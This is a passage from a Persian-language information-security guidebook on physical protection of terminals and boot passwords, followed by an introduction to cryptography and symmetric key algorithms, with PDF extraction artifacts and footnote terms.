ﺑﻪ ﻃﻮﺭ ﻃﺒﻴﻌﻲ ﻫﺮ ﻗﻄﻌﺔ ﺣﺎﻓﻈﻪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ،ﻳﻚ ﻣﺸﻜﻞ ﺣﻔﺎﻇﺘﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺧﻮﺩ ﺩﺍﺭﺩ ،ﺑﻮﻳﮋﻩ ﺍﮔـﺮ ﺍﺯ
ﺁﻥ ﻗﻄﻌﺔ ﺣﺎﻓﻈﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﻳﺎ ﺳﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺸﺎﺑﻪ ﻣﺤﻔﺎﻇﺖ ﻧﺸﻮﺩ .ﺑﺎ ﺍﻳﻨﺤـﺎﻝ ﺣﺎﻓﻈـﻪﻫـﺎﻱ ﻣﺤﻠـﻲ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻭﺳﺎﻳﻞ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺿﺎﻓﻪ ﺑﺎ ﺧﻮﺩ ﺩﺍﺭﻧﺪ ،ﭼﻮﻥ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺩﺭ ﺍﻳﻦ ﺣﺎﻓﻈﻪﻫـﺎ ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺑـﺪﻭﻥ ﺍﻃـﻼﻉ ﻛـﺎﺭﺑﺮ ﺭﺍﻳﺎﻧـﻪ
ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ.
ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ
ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻧﻬﺎ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺣﺎﻟﺖ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﻫﺎ ﻣﻲﻛﻨﻨﺪ ﺑﺴﻴﺎﺭ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﺗﺨﺮﻳﺒﮕﺮﺍﻥ ﻭ ﻣﻬﺎﺟﻤـﺎﻥ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﻳﻚ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺷﺨﺺ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ
ﺍﺯ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﺍﻳﻦ ﺷﺨﺺ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﻪ ﺷﺮﻭﻉ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺣﻤﻠﻪ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﺎ ﻛﻞ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﻳـﺪ :ﻫﺮﮔﻮﻧـﻪ
ﺭﺩﻳﺎﺑﻲ ﺣﻤﻠﻪ ﻃﺒﻴﻌﺘﹰﺎ ﺍﻧﮕﺸﺖ ﺍﺗﻬﺎﻡ ﺭﺍ ﻣﺘﻮﺟﻪ ﺷﺨﺺ ﺻﺎﺣﺐ ﺁﻥ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻣﻲﻛﻨﺪ ﻭ ﻧﻪ ﺗﺨﺮﻳﺒﮕﺮ .ﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﭘﺎﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑـﺮﺍﻱ
ﻱ ﻛﻮﺗﺎﻩ ﺯﻣﺎﻧﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻛﺮﺩ.
ﻣﺪﺗﻲ ﺑﻴﺶ ﺍﺯ ﺑﺎﺯﻩﻫﺎ ﹺ
ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﻣﺤﺎﻓﻈﻬﺎﻱ ﺻﻔﺤﻪﻧﻤﺎﻳﺶ ﺍﻳﻦ ﻗﺪﺭﺕ ﺭﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﮔﺮ ﭘﺎﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺑﻴﺶ ﺍﺯ ﭼﻨﺪ ﺩﻗﻴﻘﻪ ﺑﻲﺍﺳـﺘﻔﺎﺩﻩ ﻣﺎﻧـﺪ ﺍﻭ ﺭﺍ
ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﺎﺭﺝ -ﻳﺎ ﺣﺪﺍﻗﻞ ﺻﻔﺤﻪﻧﻤﺎﻳﺶ ﺍﻭ ﺭﺍ ﺧﺎﻟﻲ ﻭ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻭﻱ ﺭﺍ ﻗﻔـﻞ -ﻛﻨﻨـﺪ .ﺍﺯ ﻣﺰﺍﻳـﺎﻱ ﺍﻳـﻦ ﻗﺎﺑﻠﻴﺘﻬـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﻛﻠﻴﺪﻫﺎﻱ ﻣﺤﺎﻓﻆ
ﺑﺮﺧﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻛﻠﻴﺪﻱ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ .ﺑﻌﻀﻲ
ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ROMﻫﻢ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﺍﺯ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺑﺪﻭﻥ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺷـﺘﻦ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻧﻤﺎﻳﺪ .ﺳﻴﺴﺘﻢ openBOOTﺷـﺮﻛﺖ Sunﻭ ﻫﻤـﺔ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ Macintoshﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ
ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ.
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺤﺎﻓﻆ ﻭ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ROMﺍﻳﻤﻨﻲ ﺑﻴﺸﺘﺮﻱ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻫﺮﮔﺎﻩ ﻛـﻪ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﺑﺎﺷـﺪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ٦٦.ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺎﻳﺪ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺧﺘﻼﻝ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﺁﻧـﺮﺍ ﺍﺯ ﭘﺮﻳـﺰ ﺑـﺮﻕ ﺟـﺪﺍ ﻛﻨـﺪ.
ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﻤﺘﺮﻳﻦ ﺭﻭﺵ ﺣﻔﺎﻇﺖ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ،ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ.
Terminals
٦٦
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ROMﻳﻚ ﺩﻟﻴﻞ ﺧﻮﺏ ﺩﻳﮕﺮ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻴﺎﻓﺘـﺪ ﺍﮔـﺮ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺑـﻪ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﺪ ،ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﺪ ،ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺧﺎﻣﻮﺵ ﻛﻨﺪ.
65
٢٩١
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﭼﻬﺎﺭﻡ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﻛﻠﻴﺎﺕ
ﺍﻳﻦ ﻓﺼﻞ ﺭﻭﻱ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ،ﺗﺤﺮﻳﻒ ،ﻭ ﻳﺎ ﺗﺨﺮﻳﺐ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﺍﺑﻌـﺎﺩ ﺍﻣﻨﻴـﺖ
ﻣﻌﻤﻮ ﹰ
ﻻ ﻣﺤﺮﻣﺎﻧﮕﻲ ٦٧ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ -ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻳﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﺩﺍﺩﻩﻫـﺎ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎ ،ﻭ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺳﻴـﺴﺘﻢ ﺗﻮﺳـﻂ ﻛـﺎﺭﺑﺮﺍﻥ
ﻏﻴﺮﻣﺠﺎﺯ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﻨﺪ -ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺳﺖﻧﺨﻮﺭﺩﻩ ﻭ ﺻﺤﻴﺢ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩﺍﻧﺪ .ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻗﺴﻤﺖ ﺗـﺎ
ﺣﺪ ﺯﻳﺎﺩﻱ ﻣﻔﻬﻮﻣﻲ ﺍﺳﺖ ،ﻫﺮﭼﻨﺪ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﭼﻨﺪ ﺍﺻﻞ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻭﺍﻗﻌﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﺭﻣﺰﻧﮕﺎﺭﻱ
ﺭﻣﺰﻧﮕﺎﺭﻱ ٦٨ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺳﺖ ﺍﺯ ﻓﻨﻮﻥ ﺭﻳﺎﺿﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗـﻮﺍﻥ ﻛﻠﻤـﺎﺕ ﻣﻜﺘـﻮﺏ ﻭ ﺩﻳﮕـﺮ
ﺍﻧﻮﺍﻉ ﭘﻴﺎﻡ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﺒﺪﻳﻞ ﻛﺮﺩ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻛﻠﻴﺪ ﻭﻳﮋﺓ ﺭﻳﺎﺿﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﺎﺯﻛﺮﺩﻥ ﻗﻔﻞ ﭘﻴﺎﻣﻬﺎ ﻻﺯﻡ ﺍﺳـﺖ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻧﺪﺍﺷـﺘﻪ
ﺑﺎﺷﺪ ﺁﻥ ﭘﻴﺎﻣﻬﺎ ﺑﺮﺍﻳﺶ ﺑﻲﻣﻔﻬﻮﻡ ﺑﻨﻈﺮ ﺑﻴﺎﻳﺪ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ ﻳﻚ ﭘﻴﺎﻡ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ٦٩ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﺩ .ﻓﺮﺁﻳﻨـﺪ
ﺑﺎﺯﮔﺸﺖ ﻳﻚ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻗﺎﻟﺐ ﺍﻭﻟﻴﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻣﻨﺎﺳﺐ ﻧﻴﺰ ﺭﻣﺰﮔﺸﺎﻳﻲ ٧٠ﻧﺎﻡ ﺩﺍﺭﺩ.
ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻳﻚ ﮔﻴﺮﻧﺪﺓ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ .ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻭﻗﺘـﻲ ﻗﻄﻌـﻪﺍﻱ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺗﻮﺳﻂ ﻳﻚ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳـﺪﻩ ﻳـﺎ ﺍﻓـﺸﺎ ﮔـﺮﺩﺩ ﺍﻣﻨﻴـﺖ ﺁﻥ ﺧﺪﺷـﻪﺩﺍﺭ
ﻧﺨﻮﺍﻫﺪ ﺷﺪ ،ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻛﻠﻴﺪ ﻻﺯﻡ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺍﻃﻼﻋـﺎﺕ ﺍﻓـﺸﺎ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺭﻭﺵ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺗـﻼﺵ ﺑـﺮﺍﻱ
ﻲ ﺑﺪﻭﻥ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﻘﺎﻭﻣﺖ ﻛﻨﺪ.
ﺭﻣﺰﮔﺸﺎﻳ ﹺ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻓﺰﺍﻳﺶ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻋﺪﻡ ﺗﻜﺬﻳﺐ ﭘﻴﺎﻡ ٧١ﻧﻴﺰ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺗﻮﺍﺑﻊ ﻭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ
ﺍﺳﺎﺳﹰﺎ ﺩﻭ ﻧﻮﻉ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﻘﺎﺭﻥ
ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣـﺰ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ .ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﻣﺘﻘـﺎﺭﻥ ﮔـﺎﻫﻲ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﺳﺮﻱ ٧٢ﻭ ﮔﺎﻫﻲ ﻫﻢ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ٧٣ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﻧﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﻫـﺮﺩﻭﻱ ﺍﻳـﻦ ﻧﺎﻣﻬـﺎ ﺑـﻪ
٦٧
ﻳﺎ privacyﻛﻪ ﮔﺎﻫﻲ ﺑﺎ "ﻣﺤﺮﻣﺎﻧﮕﻲ" ) (confidentialityﺑﻪ ﺟﺎﻱ ﻫﻢ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﮔﺎﻫﻲ ﻫﻢ ﺑﻪ ﻃﻮﺭ ﺟﺰﺋﻲﺗﺮ ﺑﻪ ﻣﺤﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺍﻓـﺮﺍﺩ ﮔﻔﺘـﻪ
ﻣﻲﺷﻮﺩ.
Cryptography
Encryption
Decryption
Message Non-Repudiation
Secret Key Algorithms
Private Key Algorithms
68
69
70
71
72
73
٢٩٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺳﺎﺩﮔﻲ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ٧٤ﻛﻪ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻧﺪﺍﺭﻧﺪ ﺍﺷﺘﺒﺎﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ .ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ
ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺩﻭ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻧﻤﻮﺩ :ﺍﻟﮕﻮﺭﻳﺘﻬﺎﻱ ﺑﻠﻮﻙ ،٧٥ﻭ ﺍﻟﮕﻮﺭﻳﺘﻬﺎﻱ ﺟﺎﺭﻱ .٧٦ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺑﻠﻮﻙ ،ﺩﺍﺩﻩﻫﺎﻱ ﻳـﻚ
ﺑﻠﻮﻙ )ﺗﻌﺪﺍﺩﻱ ﺑﺎﻳﺖ( ﺭﺍ ﺩﺭ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺟﺎﺭﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺖ ﺑﻪ ﺑﺎﻳﺖ )ﻳﺎ ﺣﺘﻲ ﺑﻴـﺖ ﺑـﻪ ﺑﻴـﺖ(
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻧﻤﺎﻳﻨﺪ.
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻣﻮﺗـﻮﺭ ﻣﺤﺮﻛـﺔ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﻣـﺪﺭﻥ ﻫـﺴﺘﻨﺪ .ﺍﻳـﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎ ﻋﻤﻮﻣـﹰﺎ ﺑـﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ ﺍﺯ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻭ ﻛﻤﺎﺑﻴﺶ ﭘﻴﺎﺩﻩﺳﺎﺯﻱﺷﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺳﻪ ﻣـﺸﻜﻞ
ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ:
•
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻃﺮﻓﻴﻦ ﺍﺭﺗﺒﺎﻁ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺑﻪ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺑﭙﺮﺩﺍﺯﻧـﺪ،
ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺒﺎﺩﻟﻪ ﻛﻨﻨﺪ .ﻣﺒﺎﺩﻟﻪ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ.
•
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﻬﺎ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺍﺭﺳﺎﻝ ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﻛﻨﻨﺪ ،ﻫﺮ ﺩﻭ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﺭﺍ ﻧـﺰﺩ ﺧـﻮﺩ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ ﻭ ﺁﻧﺮﺍ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻧﺪ .ﺍﮔﺮ ﻛﻠﻴﺪ ﻳﻜﻲ ﺍﺯ ﻃﺮﻓﻴﻦ ﺍﺭﺗﺒﺎﻁ ﻣﺨﺪﻭﺵ ﺷﻮﺩ ﻭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺧﺒﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻣﻤﻜﻦ
ﺍﺳﺖ ﻃﺮﻑ ﺩﻭﻡ ﺍﺭﺗﺒﺎﻁ ﺑﺮﺍﻱ ﻃﺮﻑ ﺍﻭﻝ ﭘﻴﺎﻣﻲ ﺍﺭﺳﺎﻝ ﻛﻨﺪ -ﻭ ﺁﻧﮕﺎﻩ ﺁﻥ ﭘﻴﺎﻡ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺨﺪﻭﺵﺷﺪﻩ ﻣـﻮﺭﺩ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ.
•
ﺍﮔﺮ ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺎﻳﻞ ﺑﺎﺷﻨﺪ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺍﺭﺗﺒﺎﻁ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻫﺮ ﺍﺭﺗﺒﺎﻁ ﺩﻭﻧﻔﺮﻩ ﺑـﻪ ﻳـﻚ ﻛﻠﻴـﺪ ﺭﻣـﺰ
